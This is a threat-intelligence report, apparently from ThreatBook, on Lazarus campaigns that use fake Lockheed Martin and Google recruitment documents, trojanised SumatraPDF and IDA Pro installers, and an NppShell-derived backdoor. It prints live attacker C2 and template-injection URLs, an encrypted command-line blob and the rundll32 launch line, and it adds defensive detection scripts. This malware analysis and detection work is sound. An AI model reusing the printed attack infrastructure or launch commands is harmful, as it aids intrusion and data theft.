
1 Overview
Lazarus is a large overseas APT group believed to be state-sponsored. The group is adept at using social engineering to carry out targeted attacks against government, research, financial, aviation, cryptocurrency and other organizations, primarily to steal sensitive intelligence and to obtain financial gain.
ThreatBook Intelligence Bureau recently observed, through its threat hunting system, Lazarus targeted attacks against the aviation industry and against security researchers. Analysis found the following:
- The attackers forged recruitment documents of the US aerospace and defense company Lockheed Martin and delivered them to targets as decoys;
- The delivered document ultimately loads and executes a malicious backdoor module to gain remote control of the target host;
- The same document template was also used to produce Google recruitment decoy documents for attack activity;
- The attackers modified the open source NppShell project to build their Trojan, which evades detection by some security software;
- Lazarus reused an earlier technique, modifying the open source SumatraPDF reader for its attacks;
- The group also bundled malicious components into an IDA Pro installer to target security researchers;
- Through correlation analysis of related samples, IP addresses and domain names, ThreatBook extracted multiple related IOCs that can be used for threat intelligence detection. ThreatBook's threat detection platform TDP, on-premises threat intelligence platform TIP, threat intelligence cloud API, secure Internet access service OneDNS, host threat detection and response platform OneEDR, and the HFish honeypot (threat capture and deception system) all support detection of this attack and this group.
2 Details
Lazarus's use of template injection to carefully forge company recruitment documents has occurred frequently in the group's past attacks. In this activity we saw the attackers impersonate Lockheed Martin and Google and send decoy documents to targets.
Decoy recruitment document disguised as Lockheed Martin
Decoy recruitment document disguised as Google
At the same time, the open source PDF reader was modified and used to deliver phishing documents to targets.
PDF reader modified by Lazarus
In addition, the group bundled malicious components into an IDA Pro installer to carry out targeted attacks on security researchers, most likely with the primary aim of stealing high-value 0-day vulnerabilities held by researchers in order to expand the group's arsenal.
3 Sample analysis
3.1 Disguised Lockheed Martin recruitment document
The sample uses a job description from the US aerospace company Lockheed Martin as its decoy document.
Disguised recruitment document
The sample uses template injection to load a malicious template file from a remote server.
URL: https://mantis.linkundlink.de/logs/officetemplate.php?templateID=3535
Template injection in the decoy document
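The template-injection primitive used by these decoys is a `w:attachedTemplate` element in `word/settings.xml` whose relationship (in `word/_rels/settings.xml.rels`) has `TargetMode="External"` and an http(s) target, so Word fetches the template from the attacker's server when the document is opened. The scanner below is an added example written for this report, not code from the report or from the malware; it builds minimal `.docx` fixtures in memory (constructed, not real samples; the remote URLs used in the fixtures are the ones quoted in this report) and flags relationships that would trigger a remote fetch, while ignoring the normal local `file:///...Normal.dotm` attachment that Word also records as External.

```python
"""Scan a .docx for remote template injection (attachedTemplate with an external
http(s) or UNC target). Added example; not the report's or the malware's code."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.sax.saxutils import escape

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def is_remote_target(target):
    """True when Word would fetch the template over the network."""
    parts = urlsplit(target)
    if parts.scheme.lower() in ("http", "https"):
        return True
    if target.startswith("\\\\"):            # UNC path: SMB fetch, also leaks NetNTLM
        return True
    return parts.scheme.lower() == "file" and bool(parts.netloc)  # file://server/share


def find_remote_templates(docx_bytes):
    """Return the external template targets declared in word/_rels/settings.xml.rels.

    Word resolves w:attachedTemplate in word/settings.xml through an r:id into this
    rels file. A local Normal.dotm is recorded as TargetMode="External" with a
    file:///C:/... URI, so the scheme/host check above is what separates an
    injected remote template from a benign attachment.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return findings                   # no template relationship: nothing to fetch
        root = ET.fromstring(zf.read(SETTINGS_RELS))
        for rel in root.iter("{%s}Relationship" % REL_NS):
            if rel.get("Type") != ATTACHED_TEMPLATE:
                continue
            target = rel.get("Target", "")
            if rel.get("TargetMode") == "External" and is_remote_target(target):
                findings.append(target)
    return findings


# Minimal OOXML parts for a constructed fixture (not a real sample).
SETTINGS_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
    'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
    '<w:attachedTemplate r:id="rId1"/></w:settings>'
)
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:t>Senior Engineer - Job Description</w:t></w:r></w:p></w:body>'
    '</w:document>'
)


def build_fixture_docx(template_target=None):
    """Construct a minimal .docx in memory. template_target=None omits the
    template relationship entirely; any other value is recorded as External,
    which is how Word writes both local and remote attached templates."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", DOCUMENT_XML)
        zf.writestr("word/settings.xml", SETTINGS_XML)
        if template_target is not None:
            zf.writestr(SETTINGS_RELS,
                        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                        '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s" '
                        'Target="%s" TargetMode="External"/></Relationships>'
                        % (REL_NS, ATTACHED_TEMPLATE, escape(template_target, {'"': "&quot;"})))
    return buf.getvalue()


if __name__ == "__main__":
    fixtures = {
        "lockheed-decoy": build_fixture_docx(
            "https://mantis.linkundlink.de/logs/officetemplate.php?templateID=3535"),
        "intranet-decoy": build_fixture_docx("http://10.10.130.129:4080/down.php?id=2383"),
        "benign-local-template": build_fixture_docx(
            "file:///C:/Users/analyst/AppData/Roaming/Microsoft/Templates/Normal.dotm"),
        "no-template": build_fixture_docx(),
    }
    for name, doc in fixtures.items():
        print(name, find_remote_templates(doc))
```

The same check applies to `.dotx`/`.dotm` and to the `oleObject` and `hyperlink` relationships in other parts, but for this campaign the attached-template relationship is the one that matters; in a mail gateway or sandbox pre-filter, any `.docx` that returns a non-empty list here deserves detonation regardless of its VirusTotal score.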
At the time of analysis the server no longer responded, but according to associated information a DLL backdoor module is eventually loaded. The module is modified from NppShell, a component of the open source Notepad++ project, and its malicious logic lives in the export function DllGetFirstChild.
Export table of the backdoor module
The module must be invoked with command line parameters containing the marker NTPR. Once execution begins, the parameter format is checked and the parameters are decrypted. The parameters passed during actual execution were:
NTPR P6k+pR6iIKwJpU6oR6ZilgKPL7IxsitJAnpIYSx2KldSSRFFyUIzTBVFAwgzBkI2PS/+EgASBik/GgYBwBbRNy7pP+Xq4uTsxOXU6NPmudaEz7Xy5fLQica6yKHvtu2XkYmnhfeC/4ythf9I6UbAdvxvy1K2Um5ppVrEQY9WiHdxKbolqiKgLMElwSiKJrcWrQ+cMpYy5cnc+s/hufap15LJmsVFwr7MlMWwiLCGgLZPr4uSk5KIqZiadYGOlkS3cml1ZZdiZmyzZVpovmZiVlNPNXJsck4JXzpPIWw2YBcqCRMFCQJBDG4FfchmxkL2fO8V0jbSTeko2u/BI9YA9zGpM6UWoiGsdaVdqAmmIpYHjzWyM7IOSQR6SGE4dilXB0lfRXtCOEwkRTAIMgYWNnsvVRJSEvQp/xryAdsW1Df76fjl3eIb7M7lIujH5vbW7c/ e8tTy2on1uuGh+rbml5GJp4X3gv+MrYXwSOFGzHbxb9BSwFLLaaJau0FNVoh3sim4JZYi1Cz1JZYohya0FpEP9TKZMpTJgvqn4e72sdefyZrF4sI= |
The C2 addresses decrypted from the command line parameters are:
https://mante.li/images/draw.php
https://bmanal.com/images/draw.php
https://shopandtravelusa.com/vendor/monolog/monolog/src/Monolog/monolog.php
https://industryinfostructure.com/templates/worldgroup/view.php
The backdoor then collects the host's network environment, host name, user name and process list, and compresses the collected data with RtlCompressBuffer.
Host information collected by the backdoor module
It uploads this host information to the C2 server with an HTTP POST and receives the response data.
Data downloaded from the server
The payload data is extracted from the HTML-formatted response.
Payload data extraction
After XOR decryption, the backdoor acts on the server's remote instructions:
In-memory loading and execution of the PE module
| Instruction | Behaviour |
| --- | --- |
| 1 | Download and execute an EXE module |
| 2 | Download and execute a DLL module |
| 3 | Execute shellcode in memory |
Response to the server's remote instructions
During analysis, another sample of the same family was found. It uses a similar decoy document (ef2d3e488b781a7c614afa8fc8ba2b6d085ca61100d04686097f3b4dd2ed42) to load the Trojan module, and connects to an intranet address to load the template.
URL: http://10.10.130.129:4080/down.php?id=2383
Template loading in the decoy document
The dropped Trojan module is likewise modified from the open source NppShell project. At the time of analysis we observed that the sample had a very low detection rate on VirusTotal, indicating that the attackers use this approach to evade some security software.
Screenshot of the Trojan module on VirusTotal
3.2 Disguised Google recruitment document
During analysis, another sample was found that uses a template similar to the decoy document described above to impersonate a Google recruitment document.
Disguised Google recruitment document
It also uses template injection to load a malicious template file from the server, and the templateID parameter in the URL follows the same format as in the sample above.
URL: https://www.canyonzcc.com/system/templates/template.php?templateID=1010
The server also did not respond at the time of analysis, but associated information shows that it ultimately loads and executes a DLL module named "msxml3r.dll" and calls its export function SHLocalServerDll.
Export table of the Trojan module
In the export function SHLocalServerDll, the module loads a copy of itself into memory again, calls another export function, MSXMLParser, and then XOR-decrypts the C2 address: www.canyonzcc.com.
C2 address decryption
It then sends the fixed parameter page=admin&mode=product to the server via HTTP POST every 60 seconds to request data.
Communication with the C2 server
After AES decryption of the downloaded data, the module acts on the server's remote instruction and reports Success or Fail back to the server. The instruction format is as follows:
| Instruction | Behaviour |
| --- | --- |
|  | Process list |
| 2/4 | Download data |
Response to the C2 server's remote commands
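The fixed POST body and the 60-second cadence are the detectable part of this implant's traffic even when the AES-encrypted response is opaque. The script below is an added example written for this report, not code from the report or the malware: it parses constructed proxy log lines (the log format and the `/index.php` URI path are assumptions; the host `www.canyonzcc.com` and the body `page=admin&mode=product` are the values given above), groups POSTs by client, host and body, and flags groups whose request intervals are nearly constant. It generalises the report's observation to any fixed-body POST beacon, and only then checks the result against the specific indicator.

```python
"""Flag fixed-body HTTP POST beacons with a near-constant period in proxy logs.
Added example; the log format and URI path are assumed, the host and POST body
come from the report (www.canyonzcc.com, page=admin&mode=product, every 60 s)."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log: "<iso-timestamp> <client-ip> <method> <host> <path> \"<body>\"".
# 10.0.0.5 shows the implant's cadence; 10.0.0.7 is ordinary, irregular browsing.
SAMPLE_LOG = """\
2021-11-08T10:00:00Z 10.0.0.5 POST www.canyonzcc.com /index.php "page=admin&mode=product"
2021-11-08T10:00:07Z 10.0.0.7 GET  www.example.com /news ""
2021-11-08T10:01:00Z 10.0.0.5 POST www.canyonzcc.com /index.php "page=admin&mode=product"
2021-11-08T10:01:12Z 10.0.0.7 POST intranet.example.com /api/search "q=quarterly+report"
2021-11-08T10:02:01Z 10.0.0.5 POST www.canyonzcc.com /index.php "page=admin&mode=product"
2021-11-08T10:02:30Z 10.0.0.7 POST intranet.example.com /api/search "q=quarterly+report"
2021-11-08T10:03:00Z 10.0.0.5 POST www.canyonzcc.com /index.php "page=admin&mode=product"
2021-11-08T10:04:00Z 10.0.0.5 POST www.canyonzcc.com /index.php "page=admin&mode=product"
2021-11-08T10:07:30Z 10.0.0.7 POST intranet.example.com /api/search "q=quarterly+report"
2021-11-08T10:08:15Z 10.0.0.7 POST intranet.example.com /api/search "q=quarterly+report"
"""

LINE_RE = re.compile(r'^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+"([^"]*)"$')
KNOWN_HOST = "www.canyonzcc.com"            # from the report
KNOWN_BODY = "page=admin&mode=product"       # from the report


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, method, host, path, body = m.groups()
    return {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")), "src": src,
            "method": method.upper(), "host": host, "path": path, "body": body}


def find_post_beacons(lines, min_hits=4, max_jitter=0.15):
    """Group POSTs by (client, host, body); flag groups whose inter-request gaps
    have a coefficient of variation (pstdev / mean) at or below max_jitter."""
    groups = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST":
            groups[(ev["src"], ev["host"], ev["body"])].append(ev["ts"])
    beacons = []
    for (src, host, body), stamps in groups.items():
        if len(stamps) < min_hits:           # too few samples to judge periodicity
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        if period <= 0:
            continue
        jitter = pstdev(gaps) / period
        if jitter <= max_jitter:
            beacons.append({"src": src, "host": host, "body": body, "count": len(stamps),
                            "period": round(period, 1), "jitter": round(jitter, 3)})
    return beacons


def matches_report_ioc(beacon):
    """True when a flagged beacon is the exact host/body pair described in section 3.2."""
    return beacon["host"] == KNOWN_HOST and beacon["body"] == KNOWN_BODY


if __name__ == "__main__":
    for b in find_post_beacons(SAMPLE_LOG.splitlines()):
        tag = "KNOWN LAZARUS IOC" if matches_report_ioc(b) else "periodic POST"
        print(tag, b)
```

The periodicity test is what survives a change of domain; the IOC match is what gives the alert its attribution. On real traffic, raise `min_hits` and widen `max_jitter` slightly, since the 60-second sleep is measured from the end of the previous request and network latency adds a few seconds of spread.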
3.3 Modified open source PDF reader
In addition, Lazarus has recently carried out attacks using a modified build of the open source Sumatra PDF reader. This technique has appeared many times in Lazarus's previous attacks: the reader is usually delivered together with a decoy PDF document, and once that specific PDF is opened the malicious behaviour is triggered. In the captured sample, the malicious code is written directly into the reader.
Malicious code entry point in the PDF reader
When a PDF is opened with the sample reader, it checks whether the document's MD5 is "a28a25fd2ab85a2fc69019412629e5c9"; if not, the malicious path is never entered. No corresponding PDF document has been obtained at this time.
The PDF reader checks for the specific document by MD5
If the MD5 matches, the reader places a28a25fd2ab85a2fc69019412629e5c9 in the SESSID field and issues an HTTP GET request to the server, which no longer responds.
URL: https://industryinfostructure.com/templates/pdfview.php
Network request to the C2 server
It then receives the server's response and decrypts it, deciding according to the instruction whether to overwrite the PDF file. It next requests the server again to download data, decrypts it and saves it as a temporary file named NoSessions; the URL used is again https://industryinfostructure.com/templates/pdfview.php.
Downloading the execution module from the C2 server
Finally, the downloaded module is executed via rundll32.exe with the following parameters:
DllGetFirstChild NTPR P6k+pR6iIKwJpU6oR6ZilgKPL7IxsitJAnpIYSx2KldSSRFFyUIzTBVFAwgzBkI2PS/+EgASBik/GgYBwBbRNy7pP+Xq4uTsxOXU6NPmudaEz7Xy5fLQica6yKHvtu2XkYmnhfeC/4ythf9I6UbAdvxvy1K2Um5ppVrEQY9WiHdxKbolqiKgLMElwSiKJrcWrQ+cMpYy5cnc+s/hufap15LJmsVFwr7MlMWwiLCGgLZPr4uSk5KIqZiadYGOlkS3cml1ZZdiZmyzZVpovmZiVlNPNXJsck4JXzpPIWw2YBcqCRMFCQJBDG4FfchmxkL2fO8V0jbSTeko2u/BI9YA9zGpM6UWoiGsdaVdqAmmIpYHjzWyM7IOSQR6SGE4dilXB0lfRXtCOEwkRTAIMgYWNnsvVRJSEvQp/xryAdsW1Df76fjl3eIb7M7lIujH5vbW7c/ e8tTy2on1uuGh+rbml5GJp4X3gv+MrYXwSOFGzHbxb9BSwFLLaaJau0FNVoh3sim4JZYi1Cz1JZYohya0FpEP9TKZMpTJgvqn4e72sdefyZrF4sI= |
rundll32 invocation of the malicious module
Although the server did not respond during analysis, the export function name and the command line parameters are identical to those of the disguised Lockheed Martin samples analysed above, so the subsequent execution flow and the C2 used are expected to be the same. It can therefore be determined that this is the same group of attackers.
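Both delivery chains (the NppShell-derived DLL from section 3.1 and the module dropped by the PDF reader here) end in the same launch: rundll32.exe calling the export DllGetFirstChild with the marker NTPR followed by a long base64 blob that decrypts to the C2 list. That combination is an unusual and cheap thing to hunt for in process-creation telemetry. The triage below is an added example written for this report, not code from the report or the malware; the file paths in its constructed events are assumptions, while the export name, the NTPR marker and the base64 prefix are taken from the parameters quoted above.

```python
"""Triage rundll32.exe command lines for the launch pattern in this report:
export DllGetFirstChild, first argument NTPR, second argument a long base64 blob.
Added example; sample paths are assumed, the indicators come from the report."""
import re

TOKEN_RE = re.compile(r'"[^"]*"|\S+')                 # split a Windows command line, quoted paths kept whole
BASE64_BLOB_RE = re.compile(r'^[A-Za-z0-9+/]{64,}={0,2}$')
SUSPICIOUS_EXPORT = "DllGetFirstChild"
MARKER = "NTPR"

# Constructed process-creation events. The first reproduces the launch from the
# report (path assumed; the argument is the start of the blob quoted above).
SAMPLE_EVENTS = [
    r'"C:\Windows\System32\rundll32.exe" C:\Users\analyst\AppData\Local\Temp\NoSessions,DllGetFirstChild NTPR '
    "P6k+pR6iIKwJpU6oR6ZilgKPL7IxsitJAnpIYSx2KldSSRFFyUIzTBVFAwgzBkI2PS/+EgASBik/GgYBwBbRNy7p",
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    r'C:\Windows\System32\notepad.exe C:\Users\analyst\notes.txt',
]


def parse_rundll32(cmdline):
    """Return {"module", "export", "args"} for a rundll32 command line, else None.

    rundll32's documented form is "<module>,<entry> [args]"; the space-separated
    "<module> <entry> [args]" form is parsed too so the check does not depend on
    which separator the launcher used."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    if len(tokens) < 2 or not tokens[0].lower().endswith("rundll32.exe"):
        return None
    module, comma, export = tokens[1].partition(",")
    args = tokens[2:]
    if not comma and args:
        export, args = args[0], args[1:]
    return {"module": module, "export": export, "args": args}


def triage(cmdline):
    """Return the reasons a rundll32 command line matches this backdoor's launch.
    Empty list: rundll32 but nothing matched. None: not a rundll32 invocation."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return None
    reasons = []
    if parsed["export"] == SUSPICIOUS_EXPORT:
        reasons.append("export %s (entry point of the NppShell-derived backdoor)" % SUSPICIOUS_EXPORT)
    args = parsed["args"]
    if len(args) >= 2 and args[0] == MARKER and BASE64_BLOB_RE.match(args[1]):
        reasons.append("%s marker followed by a %d-char base64 blob (encrypted C2 list)"
                       % (MARKER, len(args[1])))
    if not parsed["module"].lower().endswith(".dll"):
        # Generic heuristic: rundll32 loads any PE whatever its extension, and the
        # report's dropper saves the module as a temp file without one.
        reasons.append("module without .dll extension: %s" % parsed["module"])
    return reasons


def scan(events):
    """Return (cmdline, reasons) for every event that matched at least one indicator."""
    flagged = []
    for cmdline in events:
        reasons = triage(cmdline)
        if reasons:
            flagged.append((cmdline, reasons))
    return flagged


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_EVENTS):
        print(cmdline)
        for r in reasons:
            print("  -", r)
```

Each reason is independently useful: the export name alone catches the rundll32 path even if the operators change the marker, and the NTPR-plus-base64 shape catches the same module even if it is loaded through another host process and only the argument string reaches the log.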
3.4 Attacks against security researchers
Recently the security vendor ESET disclosed a Lazarus attack on security researchers in which the attackers bundled malicious components into an IDA Pro installer. IDA Pro is Hex-Rays' flagship product (Interactive DisAssembler Professional) and one of the most widely used static disassembly and decompilation tools; its users are mostly security researchers, and because of the high price of a genuine licence some users download and run pirated copies. Lazarus took advantage of this to target security researchers, most likely in order to steal high-value 0-day vulnerabilities held by researchers and expand the group's arsenal.
Launch screen of the trojanised IDA installer
The attackers replaced an internal component of the IDA Pro installer with a malicious DLL, win_fw.dll.
Malicious module in the file list
win_fw.dll creates a Windows scheduled task that launches another malicious component, idahelper.dll.
The scheduled task created by the malicious module
idahelper.dll XOR-decrypts the URL https://www.devguardmap.org/board/board_read.asp?boardid=01.
idahelper.dll decrypts the C2 address
It calls URLOpenBlockingStream to download data from the server and loads and executes it in memory.
Download of the malicious payload from the server
The C2 server used by this sample overlaps with the group's earlier attacks on security researchers (https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers), and based on the sample's compile time and other information this is not a recent attack. ThreatBook threat intelligence identifies it accurately, so customers can discover and handle the related threat at the earliest opportunity.
Screenshot of the C2 address in the ThreatBook X community
4 Correlation analysis
Lazarus is adept at using social engineering to infiltrate targets. In October of this year the group disguised a cover letter from Incheon International Airport to conduct targeted attacks on the aviation industry, and the attacks on aviation found here confirm that the aviation industry is one of Lazarus's long-term targets.
The group often uses template injection to build decoy documents. Last year it carried out an attack known as "DreamJob" against the aviation industry, in which it likewise produced recruitment-themed decoy documents for social engineering; this is the same approach as in the activity above, and there are many connections at the sample level, such as nearly identical in-memory PE loading code.
Past attacks
Sample of this attack activity
The group is skilled at modifying open source projects for disguise, and has repeatedly modified the open source SumatraPDF reader in previous attacks to deliver phishing documents to targets, which is highly consistent with the sample from this attack.
Sumatra PDF reader modified in previous attacks
This attack modified the Sumatra PDF reader
5 Conclusion
Combining the above analysis, the aviation industry has been one of Lazarus's long-term targets. The group habitually uses social engineering against its targets, sending recruitment-themed decoy documents is one of its usual methods, and it modifies open source projects such as PDF readers to improve the stealth of its Trojans. The group also conducts targeted attacks on security researchers, which is relatively rare in APT activity. ThreatBook Intelligence Bureau will continue to track related attack activity, detect security threats in time and respond quickly.